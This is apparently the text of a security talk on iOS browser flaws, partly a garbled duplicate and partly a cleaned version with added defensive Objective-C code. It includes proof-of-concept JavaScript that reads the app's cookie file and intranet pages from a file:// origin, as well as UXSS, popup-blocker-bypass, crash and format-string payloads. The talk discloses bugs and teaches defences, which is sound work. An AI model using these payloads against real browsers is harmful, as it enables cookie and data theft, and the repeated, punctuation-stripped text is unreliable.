bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
UXSS: Universal Cross-Site Scripting

CVE-2012-2899 Chrome UXSS
• w = window.open(location.href); w.document.write('Hi');
• [webView loadHTMLString:@"Hi" baseURL:href]

CVE-2012-2899 Chrome UXSS
• w = window.open('about:blank'); w.document.write(…);
• about:blank is kind of "no URL", right?
• [webView loadHTMLString:@"…" baseURL:nil]

CVE-2012-2899 Chrome UXSS
• For baseURL = nil, UIWebView loads the applewebdata:// origin. Same as file:// - no same-origin policy, access to any web origin and to local files

CVE-2012-2899 Chrome UXSS
• w = window.open('about:blank'); w.document.write('<script>document.write(location.href)</script>');
• applewebdata:// origin
• UXSS + local file access (application sandbox/jailbreak)
Bug Bounty :-)

Safe cross-tab document.write
• w = window.open(location.href); w.document.write('Hi');
• [webView loadHTMLString:@"Hi" baseURL:[NSURL …"about:blank"]]

Safe cross-tab document.write
• iOS 8: use WKWebView UIDelegate webView:createWebViewWithConfiguration:forNavigationAction:windowFeatures:

Other potential paths to applewebdata:// or file:// origin
• baseURL: [NSURL URLWithString:@"http://example.com"] → nil (URLWithString: returns nil for a string it cannot parse)
• CFURLCreateWithString(kCFAllocatorDefault, CFSTR("http://example.com"), NULL) → NULL
• Downloads opened directly from file://

Content-Disposition: attachment
• displayed in the origin of the hosting site (iOS < 5), CVE-2011-3426, Christian Matthies, Yoshinori Oota
• isolated attachment origin (iOS 5+)
• document.location.href
• document.referrer
• w = window.open('https://' + location.hostname); w.document.write('custom SOP implementation')

Content-Type
• text/plain → HTML (iOS < 7), CVE-2013-5151, Ben Toews
• application/octet-stream → HTML
• application/other, filename.html

JS without Same-Origin-Policy
<script>
a = document.location.href.split('/');
if (a[0] === 'file:') {
  path = 'file:///' + a[3] + '/' + a[4] + '/' + a[5] + '/' + a[6] + '/' + a[7];
  path = path + '/Library/Cookies/Cookies.binarycookies';
  x = new XMLHttpRequest();
  x.open('GET', path, false);
  x.send();
  alert(x.responseText);
}
</script>

JS without Same-Origin-Policy
<script>
x = new XMLHttpRequest();
x.open('GET', 'https://your.intranet/', false);
x.send();
alert(x.responseText);
</script>

Challenge: Hijack password autofill

Opening local HTML files safely
• Open as text/plain
• Content-Security-Policy header, HTML5 sandbox
• baseURL = about:blank
• iOS 8: WKWebView configuration.preferences.javaScriptEnabled = false
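Added example (ours, not code from the slides or from any browser discussed): how a WKWebView-based tab can stay out of the applewebdata:// and file:// origins this section describes, using the about:blank base URL, the iOS 8 createWebView delegate and JavaScript-disabled viewing of downloaded files from the slides above. SafeBrowserTab and its method names are hypothetical.

```objective-c
// Added example, not from the original slides. SafeBrowserTab and its methods
// are hypothetical names; the WebKit APIs are the ones named on the slides.
#import <WebKit/WebKit.h>

@interface SafeBrowserTab : NSObject <WKUIDelegate>
@property (nonatomic, strong) WKWebView *webView;
@property (nonatomic, strong) NSMutableArray<WKWebView *> *popups;
@end

@implementation SafeBrowserTab

- (instancetype)init {
    if ((self = [super init])) {
        WKWebViewConfiguration *config = [[WKWebViewConfiguration alloc] init];
        _webView = [[WKWebView alloc] initWithFrame:CGRectZero configuration:config];
        _webView.UIDelegate = self;
        _popups = [NSMutableArray array];
    }
    return self;
}

// Browser-generated markup (error pages, a "new tab" page, text another tab
// wrote into this one): never pass baseURL:nil. On UIWebView a nil base URL
// puts the document in the applewebdata:// origin, which behaves like file://
// and is not subject to the same-origin policy. about:blank is an ordinary,
// unprivileged origin, so the same markup cannot read other sites or local files.
- (void)showGeneratedHTML:(NSString *)html {
    [self.webView loadHTMLString:html
                         baseURL:[NSURL URLWithString:@"about:blank"]];
}

// A downloaded file (README.html from an untrusted site) is shown in a
// separate view with JavaScript disabled, so even if it lands in a file://
// origin it cannot issue XMLHttpRequest against paths inside the app container.
- (WKWebView *)viewerForDownloadedFile:(NSURL *)fileURL {
    WKWebViewConfiguration *config = [[WKWebViewConfiguration alloc] init];
    config.preferences.javaScriptEnabled = NO;
    WKWebView *viewer = [[WKWebView alloc] initWithFrame:CGRectZero
                                           configuration:config];
    // iOS 9+: grant read access to this one file rather than the whole sandbox.
    [viewer loadFileURL:fileURL allowingReadAccessToURL:fileURL];
    return viewer;
}

// window.open() / target=_blank from page script: let WebKit create the new
// web view from the configuration it supplies. The opened document then gets
// its origin from WebKit's own navigation instead of from app-level
// JavaScript glue that re-injects the content with loadHTMLString:.
// Returning nil here would cancel the open (window.open() yields null).
- (WKWebView *)webView:(WKWebView *)webView
createWebViewWithConfiguration:(WKWebViewConfiguration *)configuration
   forNavigationAction:(WKNavigationAction *)navigationAction
        windowFeatures:(WKWindowFeatures *)windowFeatures {
    WKWebView *popup = [[WKWebView alloc] initWithFrame:webView.bounds
                                          configuration:configuration];
    popup.UIDelegate = self;
    [self.popups addObject:popup];
    return popup;
}

@end
```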

In this presentation
• iOS Browsers: UIWebView, WKWebView
• Address Bar Spoofing
• Universal Cross-Site Scripting
• Popups & URL handling
• SSL & password managers
Mobile Browsers Security: iOS

Popups & URL handling

Popup blockers
• Browsers rewriting href attributes for target=_blank can usually be tricked into believing the navigation was initiated by the user
• <iframe src="googlechrome://example.com">, <iframe src="merc://example.com"> etc. bypass all popup blockers anyway…

URI schemes
(diagram: scheme handlers classified as Native (WebKit) or Application (bolted-on), and as Bridge (internal) or Registered (external))
• scheme://download/https://secure.tld/victim/data, scheme://download/http://attacker.tld/README.html
• scheme://add-filter?url=

CFURL Null Pointer Dereference
• Any CFURL function that gets NULL as an argument will cause a Null Pointer Dereference
• Tested with percent encoding: http://%, http://%5, http://%5c etc.
• Example, Opera Coast: <script>document.location = 'http://%5c'</script>

Opera Coast
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x00000000
0x2f3e0d76 in CFURLCopyPath ()

• Special guest star: Safari on OS X Mavericks before Security Update 2014-02 (CVE-2014-1315)
<iframe src="lets-try-format-string:%p%p%p%p…">

In this presentation
• iOS Browsers: UIWebView, WKWebView
• Address Bar Spoofing
• Universal Cross-Site Scripting
• Popups & URL handling
• SSL & password managers

SSL & password managers

SSL
• By default, invalid certificates for iOS UIWebView https requests are rejected without user interaction
• This can be changed (e.g. allowing a user to accept a self-signed cert)
• 1/4 of tested browsers: self-signed SSL certificates are silently accepted
• In some cases the validation is done for the main domain only (e.g. Opera Coast < 3.02)

Password managers
• JavaScript with privileges of the top frame → passwords not filled for subframes
• Usually possible to force saving a password for another domain (with/without user interaction)
• Password filling checks for domain, but not always for URL scheme (https vs http)
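Added example, not from the slides or from any tested browser, serving both the CFURL Null Pointer Dereference slide above and this section: a NULL-checked CFURL path copy, a navigation delegate that fails closed on certificate errors unless the user explicitly accepted that host, and an autofill check on scheme, host and port that refuses subframes. SafeCopyPath, HardenedNavigationDelegate, EffectivePort and ShouldAutofill are hypothetical names; the code assumes a WKWebView-based browser on iOS 8 or later.

```objective-c
// Added example, not from the original slides; SafeCopyPath, HardenedNavigationDelegate,
// EffectivePort and ShouldAutofill are hypothetical names. Assumes WKWebView on iOS 8+.
#import <WebKit/WebKit.h>

// 1. URL handling. CFURLCreateWithString returns NULL for a string it cannot
//    parse (the slides crash Opera Coast with "http://%5c"), and every CFURL
//    function then dereferences that NULL. Check the result before use.
static NSString *SafeCopyPath(NSString *urlString) {
    CFURLRef url = CFURLCreateWithString(kCFAllocatorDefault,
                                         (__bridge CFStringRef)urlString, NULL);
    if (url == NULL) {
        return nil;   // unparsable URL: show an error page instead of crashing
    }
    CFStringRef path = CFURLCopyPath(url);   // safe: url is non-NULL here
    CFRelease(url);
    return path ? CFBridgingRelease(path) : nil;
}

// 2. Certificate validation. Leaving the challenge to the system rejects an
//    invalid chain without user interaction (the UIWebView default). Any
//    exception must be an explicit per-host user decision, and this check
//    runs for every challenge, subresource hosts included, not only for the
//    main document's domain.
@interface HardenedNavigationDelegate : NSObject <WKNavigationDelegate>
@property (nonatomic, strong) NSMutableSet<NSString *> *userAcceptedHosts;
@end

@implementation HardenedNavigationDelegate

- (void)webView:(WKWebView *)webView
didReceiveAuthenticationChallenge:(NSURLAuthenticationChallenge *)challenge
completionHandler:(void (^)(NSURLSessionAuthChallengeDisposition,
                            NSURLCredential *))completionHandler {
    NSURLProtectionSpace *space = challenge.protectionSpace;
    if (![space.authenticationMethod isEqualToString:NSURLAuthenticationMethodServerTrust]) {
        completionHandler(NSURLSessionAuthChallengePerformDefaultHandling, nil);
        return;
    }
    // The pattern behind silently accepted self-signed certificates is to
    // answer every server-trust challenge with
    //   completionHandler(NSURLSessionAuthChallengeUseCredential,
    //                     [NSURLCredential credentialForTrust:space.serverTrust]);
    // Corrected: do that only for a host the user accepted after a warning.
    if ([self.userAcceptedHosts containsObject:space.host]) {
        completionHandler(NSURLSessionAuthChallengeUseCredential,
                          [NSURLCredential credentialForTrust:space.serverTrust]);
    } else {
        completionHandler(NSURLSessionAuthChallengePerformDefaultHandling, nil);
    }
}

@end

// 3. Password autofill. The saved entry is keyed by the URL of the document
//    that contained the login form (taken from the web view's request, not
//    from page JavaScript), and is offered only when scheme, host and port
//    all match and the form is in the top-level document.
static NSNumber *EffectivePort(NSURL *url) {
    if (url.port != nil) {
        return url.port;
    }
    return [url.scheme.lowercaseString isEqualToString:@"https"] ? @443 : @80;
}

static BOOL ShouldAutofill(NSURL *savedFor, NSURL *current, BOOL isMainFrame) {
    if (!isMainFrame) {
        return NO;   // a login form inside an <iframe> never gets the password
    }
    if (![savedFor.scheme.lowercaseString isEqualToString:current.scheme.lowercaseString]) {
        return NO;   // an https login is not offered to http://same-host/
    }
    if (![savedFor.host.lowercaseString isEqualToString:current.host.lowercaseString]) {
        return NO;
    }
    return [EffectivePort(savedFor) isEqualToNumber:EffectivePort(current)];
}
```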

Summary
• UIWebViews should be replaced with iOS 8 WKWebViews in browser applications
• Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
• Mobile device management and other enterprise solutions often include a browser application. Did you test it?

References
• https://developer.apple.com/library/ios/documentation/AppleApplications/Reference/SafariWebContent/
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebView_Class/Reference/Reference.html
